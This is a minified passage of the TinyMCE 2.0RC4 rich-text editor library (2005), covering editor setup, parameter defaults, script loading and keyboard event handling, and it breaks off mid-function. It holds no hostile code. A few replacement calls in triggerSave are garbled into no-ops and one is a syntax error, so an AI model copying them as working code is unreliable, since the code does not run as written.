* $RCSfile: tiny_mce.js,v $ * $Revision: 1.301 $ * $Date: 2005/10/30 16:06:56 $ * * @author Moxiecode * @copyright Copyright � 2004, Moxiecode Systems AB, All rights reserved. */ function TinyMCE(){this.majorVersion="2";this.minorVersion="0RC4";this.releaseDate="2005-10-30";this.instances=new Array();this.stickyClassesLookup=new Array();this.windowArgs=new Array();this.loadedFiles=new Array();this.configs=new Array();this.currentConfig=0;this.eventHandlers=new Array();var ua=navigator.userAgent;this.isMSIE=(navigator.appName=="Microsoft Internet Explorer");this.isMSIE5=this.isMSIE&&(ua.indexOf('MSIE 5')!=-1);this.isMSIE5_0=this.isMSIE&&(ua.indexOf('MSIE 5.0')!=-1);this.isGecko=ua.indexOf('Gecko')!=-1;this.isGecko18=ua.indexOf('Gecko')!=-1&&ua.indexOf('rv:1.8')!=-1;this.isSafari=ua.indexOf('Safari')!=-1;this.isOpera=ua.indexOf('Opera')!=-1;this.isMac=ua.indexOf('Mac')!=-1;this.isNS7=ua.indexOf('Netscape/7')!=-1;this.isNS71=ua.indexOf('Netscape/7.1')!=-1;this.dialogCounter=0;if(this.isOpera){this.isMSIE=true;this.isGecko=false;this.isSafari=false;}this.idCounter=0;};TinyMCE.prototype.defParam=function(key,def_val){this.settings[key]=tinyMCE.getParam(key,def_val);};TinyMCE.prototype.init=function(settings){var theme;this.settings=settings;if(typeof(document.execCommand)=='undefined')return;if(!tinyMCE.baseURL){var elements=document.getElementsByTagName('script');for(var i=0;i<elements.length;i++){if(elements[i].src&&(elements[i].src.indexOf("tiny_mce.js")!=-1||elements[i].src.indexOf("tiny_mce_src.js")!=-1||elements[i].src.indexOf("tiny_mce_gzip.php")!=-1)){var src=elements[i].src;tinyMCE.srcMode=(src.indexOf('_src')!=-1)?'_src':'';src=src.substring(0,src.lastIndexOf('/'));tinyMCE.baseURL=src;break;}}}this.documentBasePath=document.location.href;if(this.documentBasePath.indexOf('?')!=-1)this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.indexOf('?'));this.documentURL=this.documentBasePath;this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.lastIndexOf('/'));if(tinyMCE.baseURL.indexOf('://')==-1&&tinyMCE.baseURL.charAt(0)!='/'){tinyMCE.baseURL=this.documentBasePath+"/"+tinyMCE.baseURL;}this.defParam("mode","none");this.defParam("theme","advanced");this.defParam("plugins","",true);this.defParam("language","en");this.defParam("docs_language",this.settings['language']);this.defParam("elements","");this.defParam("textarea_trigger","mce_editable");this.defParam("editor_selector","");this.defParam("editor_deselector","mceNoEditor");this.defParam("valid_elements","+a[id|style|rel|rev|charset|hreflang|dir|lang|tabindex|accesskey|type|name|href|target|title|class|onfocus|onblur|onclick|ondblclick|onmousedown|onmouseup|onmouseover|onmousemove|onmouseout|onkeypress|onkeydown|onkeyup],-strong/b[class|style],-em/i[class|style],-strike[class|style],-u[class|style],+p[style|dir|class|align],-ol[class|style],-ul[class|style],-li[class|style],br,img[id|dir|lang|longdesc|usemap|style|class|src|onmouseover|onmouseout|border=0|alt|title|hspace|vspace|width|height|align],-sub[style|class],-sup[style|class],-blockquote[dir|style],-table[border=0|cellspacing|cellpadding|width|height|class|align|summary|style|dir|id|lang|bgcolor|background|bordercolor],-tr[id|lang|dir|class|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor],tbody[id|class],thead[id|class],tfoot[id|class],-td[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor|scope],-th[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|scope],caption[id|lang|dir|class|style],-div[id|dir|class|align|style],-span[style|class|align],-pre[class|align|style],address[class|align|style],-h1[style|dir|class|align],-h2[style|dir|class|align],-h3[style|dir|class|align],-h4[style|dir|class|align],-h5[style|dir|class|align],-h6[style|dir|class|align],hr[class|style],font[face|size|style|id|class|dir|color]");this.defParam("extended_valid_elements","");this.defParam("invalid_elements","");this.defParam("encoding","");this.defParam("urlconverter_callback",tinyMCE.getParam("urlconvertor_callback","TinyMCE.prototype.convertURL"));this.defParam("save_callback","");this.defParam("debug",false);this.defParam("force_br_newlines",false);this.defParam("force_p_newlines",true);this.defParam("add_form_submit_trigger",true);this.defParam("relative_urls",true);this.defParam("remove_script_host",true);this.defParam("focus_alert",true);this.defParam("document_base_url",this.documentURL);this.defParam("visual",true);this.defParam("visual_table_class","mceVisualAid");this.defParam("setupcontent_callback","");this.defParam("fix_content_duplication",true);this.defParam("custom_undo_redo",true);this.defParam("custom_undo_redo_levels",-1);this.defParam("custom_undo_redo_keyboard_shortcuts",true);this.defParam("verify_css_classes",false);this.defParam("verify_html",true);this.defParam("apply_source_formatting",false);this.defParam("directionality","ltr");this.defParam("cleanup_on_startup",false);this.defParam("inline_styles",false);this.defParam("convert_newlines_to_brs",false);this.defParam("auto_reset_designmode",true);this.defParam("entities","160,nbsp,38,amp,34,quot,162,cent,8364,euro,163,pound,165,yen,169,copy,174,reg,8482,trade,8240,permil,181,micro,183,middot,8226,bull,8230,hellip,8242,prime,8243,Prime,167,sect,182,para,223,szlig,8249,lsaquo,8250,rsaquo,171,laquo,187,raquo,8216,lsquo,8217,rsquo,8220,ldquo,8221,rdquo,8218,sbquo,8222,bdquo,60,lt,62,gt,8804,le,8805,ge,8211,ndash,8212,mdash,175,macr,8254,oline,164,curren,166,brvbar,168,uml,161,iexcl,191,iquest,710,circ,732,tilde,176,deg,8722,minus,177,plusmn,247,divide,8260,frasl,215,times,185,sup1,178,sup2,179,sup3,188,frac14,189,frac12,190,frac34,402,fnof,8747,int,8721,sum,8734,infin,8730,radic,8764,sim,8773,cong,8776,asymp,8800,ne,8801,equiv,8712,isin,8713,notin,8715,ni,8719,prod,8743,and,8744,or,172,not,8745,cap,8746,cup,8706,part,8704,forall,8707,exist,8709,empty,8711,nabla,8727,lowast,8733,prop,8736,ang,180,acute,184,cedil,170,ordf,186,ordm,8224,dagger,8225,Dagger,192,Agrave,194,Acirc,195,Atilde,196,Auml,197,Aring,198,AElig,199,Ccedil,200,Egrave,202,Ecirc,203,Euml,204,Igrave,206,Icirc,207,Iuml,208,ETH,209,Ntilde,210,Ograve,212,Ocirc,213,Otilde,214,Ouml,216,Oslash,338,OElig,217,Ugrave,219,Ucirc,220,Uuml,376,Yuml,222,THORN,224,agrave,226,acirc,227,atilde,228,auml,229,aring,230,aelig,231,ccedil,232,egrave,234,ecirc,235,euml,236,igrave,238,icirc,239,iuml,240,eth,241,ntilde,242,ograve,244,ocirc,245,otilde,246,ouml,248,oslash,339,oelig,249,ugrave,251,ucirc,252,uuml,254,thorn,255,yuml,914,Beta,915,Gamma,916,Delta,917,Epsilon,918,Zeta,919,Eta,920,Theta,921,Iota,922,Kappa,923,Lambda,924,Mu,925,Nu,926,Xi,927,Omicron,928,Pi,929,Rho,931,Sigma,932,Tau,933,Upsilon,934,Phi,935,Chi,936,Psi,937,Omega,945,alpha,946,beta,947,gamma,948,delta,949,epsilon,950,zeta,951,eta,952,theta,953,iota,954,kappa,955,lambda,956,mu,957,nu,958,xi,959,omicron,960,pi,961,rho,962,sigmaf,963,sigma,964,tau,965,upsilon,966,phi,967,chi,968,psi,969,omega,8501,alefsym,982,piv,8476,real,977,thetasym,978,upsih,8472,weierp,8465,image,8592,larr,8593,uarr,8594,rarr,8595,darr,8596,harr,8629,crarr,8656,lArr,8657,uArr,8658,rArr,8659,dArr,8660,hArr,8756,there4,8834,sub,8835,sup,8836,nsub,8838,sube,8839,supe,8853,oplus,8855,otimes,8869,perp,8901,sdot,8968,lceil,8969,rceil,8970,lfloor,8971,rfloor,9001,lang,9002,rang,9674,loz,9824,spades,9827,clubs,9829,hearts,9830,diams,8194,ensp,8195,emsp,8201,thinsp,8204,zwnj,8205,zwj,8206,lrm,8207,rlm,173,shy,233,eacute,237,iacute,243,oacute,250,uacute,193,Aacute,225,aacute,201,Eacute,205,Iacute,211,Oacute,218,Uacute,221,Yacute,253,yacute");this.defParam("entity_encoding","named");this.defParam("cleanup_callback","");this.defParam("add_unload_trigger",true);this.defParam("ask",false);this.defParam("nowrap",false);this.defParam("auto_resize",false);this.defParam("auto_focus",false);this.defParam("cleanup",true);this.defParam("remove_linebreaks",true);this.defParam("button_tile_map",false);this.defParam("submit_patch",true);this.defParam("browsers","msie,safari,gecko,opera");this.defParam("dialog_type","window");this.defParam("accessibility_warnings",true);this.defParam("merge_styles_invalid_parents","");this.defParam("force_hex_style_colors",true);this.defParam("trim_span_elements",true);this.defParam("convert_fonts_to_spans",false);this.defParam("doctype",'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">');this.defParam("font_size_classes",'');this.defParam("font_size_style_values",'xx-small,x-small,small,medium,large,x-large,xx-large');this.defParam("event_elements",'a,img');if(this.isMSIE&&this.settings['browsers'].indexOf('msie')==-1)return;if(this.isGecko&&this.settings['browsers'].indexOf('gecko')==-1)return;if(this.isSafari&&this.settings['browsers'].indexOf('safari')==-1)return;if(this.isOpera&&this.settings['browsers'].indexOf('opera')==-1)return;var baseHREF=tinyMCE.settings['document_base_url'];if(baseHREF.indexOf('?')!=-1)baseHREF=baseHREF.substring(0,baseHREF.indexOf('?'));this.settings['base_href']=baseHREF.substring(0,baseHREF.lastIndexOf('/'))+"/";theme=this.settings['theme'];this.blockRegExp=new RegExp("^(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|blockquote|center|dl|dir|fieldset|form|noscript|noframes|menu|isindex)$","i");this.posKeyCodes=new Array(13,45,36,35,33,34,37,38,39,40);this.uniqueURL='http://tinymce.moxiecode.cp/mce_temp_url';this.settings['theme_href']=tinyMCE.baseURL+"/themes/"+theme;if(!tinyMCE.isMSIE)this.settings['force_br_newlines']=false;if(tinyMCE.getParam("content_css",false)){var cssPath=tinyMCE.getParam("content_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['content_css']=this.documentBasePath+"/"+cssPath;else this.settings['content_css']=cssPath;}else this.settings['content_css']='';if(tinyMCE.getParam("popups_css",false)){var cssPath=tinyMCE.getParam("popups_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['popups_css']=this.documentBasePath+"/"+cssPath;else this.settings['popups_css']=cssPath;}else this.settings['popups_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_popup.css";if(tinyMCE.getParam("editor_css",false)){var cssPath=tinyMCE.getParam("editor_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['editor_css']=this.documentBasePath+"/"+cssPath;else this.settings['editor_css']=cssPath;}else this.settings['editor_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_ui.css";if(tinyMCE.settings['debug']){var msg="Debug: \n";msg+="baseURL: "+this.baseURL+"\n";msg+="documentBasePath: "+this.documentBasePath+"\n";msg+="content_css: "+this.settings['content_css']+"\n";msg+="popups_css: "+this.settings['popups_css']+"\n";msg+="editor_css: "+this.settings['editor_css']+"\n";alert(msg);}this._initCleanup();if(this.configs.length==0){if(this.isSafari&&this.getParam('safari_warning',true))alert("Safari support is very limited and should be considered experimental.\nSo there is no need to even submit bugreports on this early version.\nYou can disable this message by setting: safari_warning option to false");tinyMCE.addEvent(window,"load",TinyMCE.prototype.onLoad);if(tinyMCE.isMSIE){if(tinyMCE.settings['add_unload_trigger']){tinyMCE.addEvent(window,"unload",TinyMCE.prototype.unloadHandler);tinyMCE.addEvent(window.document,"beforeunload",TinyMCE.prototype.unloadHandler);}}else{if(tinyMCE.settings['add_unload_trigger'])tinyMCE.addEvent(window,"unload",function(){tinyMCE.triggerSave(true,true);});}}this.loadScript(tinyMCE.baseURL+'/themes/'+this.settings['theme']+'/editor_template'+tinyMCE.srcMode+'.js');this.loadScript(tinyMCE.baseURL+'/langs/'+this.settings['language']+'.js');this.loadCSS(this.settings['editor_css']);var themePlugins=tinyMCE.getParam('plugins','',true,',');if(this.settings['plugins']!=''){for(var i=0;i<themePlugins.length;i++)this.loadScript(tinyMCE.baseURL+'/plugins/'+themePlugins[i]+'/editor_plugin'+tinyMCE.srcMode+'.js');}settings['index']=this.configs.length;this.configs[this.configs.length]=settings;};TinyMCE.prototype.loadScript=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<sc'+'ript language="javascript" type="text/javascript" src="'+url+'"></script>');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.loadCSS=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<link href="'+url+'" rel="stylesheet" type="text/css" />');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.importCSS=function(doc,css_file){if(css_file=='')return;if(typeof(doc.createStyleSheet)=="undefined"){var elm=doc.createElement("link");elm.rel="stylesheet";elm.href=css_file;if((headArr=doc.getElementsByTagName("head"))!=null&&headArr.length>0)headArr[0].appendChild(elm);}else var styleSheet=doc.createStyleSheet(css_file);};TinyMCE.prototype.confirmAdd=function(e,settings){var elm=tinyMCE.isMSIE?event.srcElement:e.target;var elementId=elm.name?elm.name:elm.id;tinyMCE.settings=settings;if(!elm.getAttribute('mce_noask')&&confirm(tinyMCELang['lang_edit_confirm']))tinyMCE.addMCEControl(elm,elementId);elm.setAttribute('mce_noask','true');};TinyMCE.prototype.updateContent=function(form_element_name){var formElement=document.getElementById(form_element_name);for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();if(inst.formElement==formElement){var doc=inst.getDoc();tinyMCE._setHTML(doc,inst.formElement.value);if(!tinyMCE.isMSIE)doc.body.innerHTML=tinyMCE._cleanupHTML(inst,doc,this.settings,doc.body,inst.visualAid);}}};TinyMCE.prototype.addMCEControl=function(replace_element,form_element_name,target_document){var id="mce_editor_"+tinyMCE.idCounter++;var inst=new TinyMCEControl(tinyMCE.settings);inst.editorId=id;this.instances[id]=inst;inst.onAdd(replace_element,form_element_name,target_document);};TinyMCE.prototype.triggerSave=function(skip_cleanup,skip_callback){for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();tinyMCE.settings['preformatted']=false;if(typeof(skip_cleanup)=="undefined")skip_cleanup=false;if(typeof(skip_callback)=="undefined")skip_callback=false;tinyMCE._setHTML(inst.getDoc(),inst.getBody().innerHTML);if(inst.settings['cleanup']==false){tinyMCE.handleVisualAid(inst.getBody(),true,false,inst);tinyMCE._setEventsEnabled(inst.getBody(),true);}tinyMCE._customCleanup(inst,"submit_content_dom",inst.contentWindow.document.body);var htm=skip_cleanup?inst.getBody().innerHTML:tinyMCE._cleanupHTML(inst,inst.getDoc(),this.settings,inst.getBody(),this.visualAid,true);htm=tinyMCE._customCleanup(inst,"submit_content",htm);if(tinyMCE.settings["encoding"]=="xml"||tinyMCE.settings["encoding"]=="html")htm=tinyMCE.convertStringToXML(htm);if(!skip_callback&&tinyMCE.settings['save_callback']!="")var content=eval(tinyMCE.settings['save_callback']+"(inst.formTargetElementId,htm,inst.getBody());");if((typeof(content)!="undefined")&&content!=null)htm=content;htm=tinyMCE.regexpReplace(htm,"(","(","gi");htm=tinyMCE.regexpReplace(htm,")",")","gi");htm=tinyMCE.regexpReplace(htm,";",";","gi");htm=tinyMCE.regexpReplace(htm,""",""","gi");htm=tinyMCE.regexpReplace(htm,"^","^","gi");if(inst.formElement)inst.formElement.value=htm;}};TinyMCE.prototype._setEventsEnabled=function(node,state){var events=new Array('onfocus','onblur','onclick','ondblclick','onmousedown','onmouseup','onmouseover','onmousemove','onmouseout','onkeypress','onkeydown','onkeydown','onkeyup');var evs=tinyMCE.settings['event_elements'].split(',');for(var y=0;y<evs.length;y++){var elms=node.getElementsByTagName(evs[y]);for(var i=0;i<elms.length;i++){var event="";for(var x=0;x<events.length;x++){if((event=tinyMCE.getAttrib(elms[i],events[x]))!=''){event=tinyMCE.cleanupEventStr(""+event);if(!state)event="return true;"+event;else event=event.replace(/^return true;/gi,'');elms[i].removeAttribute(events[x]);elms[i].setAttribute(events[x],event);}}}}};TinyMCE.prototype.resetForm=function(form_index){var formObj=document.forms[form_index];for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();for(var i=0;i<formObj.elements.length;i++){if(inst.formTargetElementId==formObj.elements[i].name){inst.getBody().innerHTML=formObj.elements[i].value;return;}}}};TinyMCE.prototype.execInstanceCommand=function(editor_id,command,user_interface,value,focus){var inst=tinyMCE.getInstanceById(editor_id);if(inst){if(typeof(focus)=="undefined")focus=true;if(focus)inst.contentWindow.focus();inst.autoResetDesignMode();this.selectedElement=inst.getFocusElement();this.selectedInstance=inst;tinyMCE.execCommand(command,user_interface,value);if(tinyMCE.isMSIE&&window.event!=null)tinyMCE.cancelEvent(window.event);}};TinyMCE.prototype.execCommand=function(command,user_interface,value){user_interface=user_interface?user_interface:false;value=value?value:null;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();switch(command){case 'mceHelp':var template=new Array();template['file']='about.htm';template['width']=480;template['height']=380;tinyMCE.openWindow(template,{tinymce_version:tinyMCE.majorVersion+"."+tinyMCE.minorVersion,tinymce_releasedate:tinyMCE.releaseDate,inline:"yes"});return;case 'mceFocus':var inst=tinyMCE.getInstanceById(value);if(inst)inst.contentWindow.focus();return;case "mceAddControl":case "mceAddEditor":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value);return;case "mceAddFrameControl":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value['element'],value['document']);return;case "mceRemoveControl":case "mceRemoveEditor":tinyMCE.removeMCEControl(value);return;case "mceResetDesignMode":if(!tinyMCE.isMSIE){for(var n in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[n]))continue;try{tinyMCE.instances[n].getDoc().designMode="on";}catch(e){}}}return;}if(this.selectedInstance){this.selectedInstance.execCommand(command,user_interface,value);}else if(tinyMCE.settings['focus_alert'])alert(tinyMCELang['lang_focus_alert']);};TinyMCE.prototype.eventPatch=function(editor_id){if(typeof(tinyMCE)=="undefined")return true;for(var i=0;i<document.frames.length;i++){try{if(document.frames[i].event){var event=document.frames[i].event;if(!event.target)event.target=event.srcElement;TinyMCE.prototype.handleEvent(event);return;}}catch(ex){}}};TinyMCE.prototype.unloadHandler=function(){tinyMCE.triggerSave(true,true);};TinyMCE.prototype.addEventHandlers=function(editor_id){if(tinyMCE.isMSIE){var doc=document.frames[editor_id].document;tinyMCE.addEvent(doc,"keypress",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keyup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keydown",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"mouseup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"click",TinyMCE.prototype.eventPatch);}else{var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();inst.switchSettings();tinyMCE.addEvent(doc,"keypress",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keydown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keyup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"click",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mouseup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mousedown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"focus",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"blur",tinyMCE.handleEvent);eval('try { doc.designMode = "On"; } catch(e) {}');}};TinyMCE.prototype._createIFrame=function(replace_element){var iframe=document.createElement("iframe");var id=replace_element.getAttribute("id");var aw,ah;aw=""+tinyMCE.settings['area_width'];ah=""+tinyMCE.settings['area_height'];if(aw.indexOf('%')==-1){aw=parseInt(aw);aw=aw<0?300:aw;aw=aw+"px";}if(ah.indexOf('%')==-1){ah=parseInt(ah);ah=ah<0?240:ah;ah=ah+"px";}iframe.setAttribute("id",id);iframe.setAttribute("border","0");iframe.setAttribute("frameBorder","0");iframe.setAttribute("marginWidth","0");iframe.setAttribute("marginHeight","0");iframe.setAttribute("leftMargin","0");iframe.setAttribute("topMargin","0");iframe.setAttribute("width",aw);iframe.setAttribute("height",ah);iframe.setAttribute("allowtransparency","true");if(tinyMCE.settings["auto_resize"])iframe.setAttribute("scrolling","no");if(tinyMCE.isMSIE&&!tinyMCE.isOpera)iframe.setAttribute("src",this.settings['default_document']);iframe.style.width=aw;iframe.style.height=ah;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)replace_element.outerHTML=iframe.outerHTML;else replace_element.parentNode.replaceChild(iframe,replace_element);if(tinyMCE.isMSIE)return window.frames[id];else return iframe;};TinyMCE.prototype.setupContent=function(editor_id){var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();var head=doc.getElementsByTagName('head').item(0);var content=inst.startContent;tinyMCE.operaOpacityCounter=100*tinyMCE.idCounter;inst.switchSettings();if(!tinyMCE.isMSIE&&doc.title!="blank_page"){try{doc.location.href=tinyMCE.baseURL+"/blank.htm";}catch(ex){}window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",1000);return;}if(!head){window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",10);return;}tinyMCE.importCSS(inst.getDoc(),tinyMCE.baseURL+"/themes/"+inst.settings['theme']+"/css/editor_content.css");tinyMCE.importCSS(inst.getDoc(),inst.settings['content_css']);tinyMCE.executeCallback('init_instance_callback','_initInstance',0,inst);if(tinyMCE.getParam("convert_fonts_to_spans"))inst.getDoc().body.setAttribute('id','mceSpanFonts');if(tinyMCE.settings['nowrap'])doc.body.style.whiteSpace="nowrap";doc.body.dir=this.settings['directionality'];doc.editorId=editor_id;if(!tinyMCE.isMSIE)doc.documentElement.editorId=editor_id;var base=doc.createElement("base");base.setAttribute('href',tinyMCE.settings['base_href']);head.appendChild(base);if(tinyMCE.settings['convert_newlines_to_brs']){content=tinyMCE.regexpReplace(content,"\r\n","<br />","gi");content=tinyMCE.regexpReplace(content,"\r","<br />","gi");content=tinyMCE.regexpReplace(content,"\n","<br />","gi");}content=tinyMCE._customCleanup(inst,"insert_to_editor",content);if(tinyMCE.isMSIE){window.setInterval('try{tinyMCE.getCSSClasses(document.frames["'+editor_id+'"].document, "'+editor_id+'");}catch(e){}',500);if(tinyMCE.settings["force_br_newlines"])document.frames[editor_id].document.styleSheets[0].addRule("p","margin: 0px;");var body=document.frames[editor_id].document.body;tinyMCE.addEvent(body,"beforepaste",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(body,"beforecut",TinyMCE.prototype.eventPatch);body.editorId=editor_id;}content=tinyMCE.cleanupHTMLCode(content);if(!tinyMCE.isMSIE){var contentElement=inst.getDoc().createElement("body");var doc=inst.getDoc();contentElement.innerHTML=content;if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt'])content=content.replace(new RegExp('<>','g'),"");if(tinyMCE.settings['cleanup_on_startup'])tinyMCE.setInnerHTML(inst.getBody(),tinyMCE._cleanupHTML(inst,doc,this.settings,contentElement));else{content=tinyMCE.regexpReplace(content,"<strong","<b","gi");content=tinyMCE.regexpReplace(content,"<em(/?)>","<i$1>","gi");content=tinyMCE.regexpReplace(content,"<em ","<i ","gi");content=tinyMCE.regexpReplace(content,"</strong>","</b>","gi");content=tinyMCE.regexpReplace(content,"</em>","</i>","gi");tinyMCE.setInnerHTML(inst.getBody(),content);}inst.convertAllRelativeURLs();}else{if(tinyMCE.settings['cleanup_on_startup']){tinyMCE._setHTML(inst.getDoc(),content);eval('try {tinyMCE.setInnerHTML(inst.getBody(), tinyMCE._cleanupHTML(inst, inst.contentDocument, this.settings, inst.getBody());} catch(e) {}');}else tinyMCE._setHTML(inst.getDoc(),content);}var parentElm=document.getElementById(inst.editorId+'_parent');if(parentElm.lastChild.nodeName.toLowerCase()=="input")inst.formElement=parentElm.lastChild;else inst.formElement=parentElm.nextSibling;tinyMCE.handleVisualAid(inst.getBody(),true,tinyMCE.settings['visual'],inst);tinyMCE.executeCallback('setupcontent_callback','_setupContent',0,editor_id,inst.getBody(),inst.getDoc());if(!tinyMCE.isMSIE)TinyMCE.prototype.addEventHandlers(editor_id);if(tinyMCE.isMSIE)tinyMCE.addEvent(inst.getBody(),"blur",TinyMCE.prototype.eventPatch);tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=inst.contentWindow.document.body;tinyMCE.triggerNodeChange(false,true);tinyMCE._customCleanup(inst,"insert_to_editor_dom",inst.getBody());tinyMCE._customCleanup(inst,"setup_content_dom",inst.getBody());tinyMCE._setEventsEnabled(inst.getBody(),false);tinyMCE.cleanupAnchors(inst.getDoc());if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(inst.getDoc());inst.startContent=tinyMCE.trim(inst.getBody().innerHTML);inst.undoLevels[inst.undoLevels.length]=inst.startContent;tinyMCE.operaOpacityCounter=-1;};TinyMCE.prototype.cleanupHTMLCode=function(s){s=s.replace(/<p\/>/gi,'<p> </p>');s=s.replace(/<p>\s*<\/p>/gi,'<p> </p>');s=s.replace(/<(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|b|em|strong|i|strike|u|span|a|ul|ol|li|blockquote)([^\\|>]*?)\/>/gi,'<$1$2></$1>');s=s.replace(new RegExp('\\s+></','gi'),'></');if(tinyMCE.isMSIE)s=s.replace(/<p><hr\/><\/p>/gi,"<hr>");s=s.replace(new RegExp('(href=\"?)(\\s*?#)','gi'),'$1'+tinyMCE.settings['document_base_url']+"#");return s;};TinyMCE.prototype.cancelEvent=function(e){if(tinyMCE.isMSIE){e.returnValue=false;e.cancelBubble=true;}else e.preventDefault();};TinyMCE.prototype.removeTinyMCEFormElements=function(form_obj){for(var i=0;i<form_obj.elements.length;i++){var elementId=form_obj.elements[i].name?form_obj.elements[i].name:form_obj.elements[i].id;if(elementId.indexOf('mce_editor_')==0)form_obj.elements[i].disabled=true;}};TinyMCE.prototype.accessibleEventHandler=function(e){var win=this._win;e=tinyMCE.isMSIE?win.event:e;var elm=tinyMCE.isMSIE?e.srcElement:e.target;if(elm.nodeName=="SELECT"&&!elm.oldonchange){elm.oldonchange=elm.onchange;elm.onchange=null;}if(e.keyCode==13||e.keyCode==32){elm.onchange=elm.oldonchange;elm.onchange();elm.oldonchange=null;tinyMCE.cancelEvent(e);}};TinyMCE.prototype.addSelectAccessibility=function(e,select,win){if(!select._isAccessible){select.onkeydown=tinyMCE.accessibleEventHandler;select._isAccessible=true;select._win=win;}};TinyMCE.prototype.handleEvent=function(e){if(typeof(tinyMCE)=="undefined")return true;switch(e.type){case "blur":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.execCommand('mceEndTyping');return;case "submit":tinyMCE.removeTinyMCEFormElements(tinyMCE.isMSIE?window.event.srcElement:e.target);tinyMCE.triggerSave();tinyMCE.isNotDirty=true;return;case "reset":var formObj=tinyMCE.isMSIE?window.event.srcElement:e.target;for(var i=0;i<document.forms.length;i++){if(document.forms[i]==formObj)window.setTimeout('tinyMCE.resetForm('+i+');',10);}return;case "keypress":if(e.target.editorId){tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];}else{if(e.target.ownerDocument.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.ownerDocument.editorId];}if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&e.keyCode==13&&!e.shiftKey){if(tinyMCE.selectedInstance._insertPara(e)){tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.cancelEvent(e);return false;}}if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}if(tinyMCE.isGecko&&(e.ctrlKey&&!e.altKey)&&tinyMCE.settings['custom_undo_redo']){if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.charCode==122){tinyMCE.selectedInstance.execCommand("Undo");e.preventDefault();return false;}if(e.charCode==121){tinyMCE.selectedInstance.execCommand("Redo");e.preventDefault();return false;}}if(e.charCode==98){tinyMCE.selectedInstance.execCommand("Bold");e.preventDefault();return false;}if(e.charCode==105){tinyMCE.selectedInstance.execCommand("Italic");e.preventDefault();return false;}if(e.charCode==117){tinyMCE.selectedInstance.execCommand("Underline");e.preventDefault();return false;}}if(tinyMCE.isMSIE&&tinyMCE.settings['force_br_newlines']&&e.keyCode==13){if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.selectedInstance){var sel=tinyMCE.selectedInstance.getDoc().selection;var rng=sel.createRange();if(tinyMCE.getParentElement(rng.parentElement(),"li")!=null)return false;e.returnValue=false;e.cancelBubble=true;rng.pasteHTML("<br />");rng.collapse(false);rng.select();tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.triggerNodeChange(false);return false;}}if(e.keyCode==8||e.keyCode==46){tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(e.target,"a");tinyMCE.imgElement=tinyMCE.getParentElement(e.target,"img");tinyMCE.triggerNodeChange(false);}return false;break;case "keyup":case "keydown":if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];else return;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var inst=tinyMCE.selectedInstance;if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return 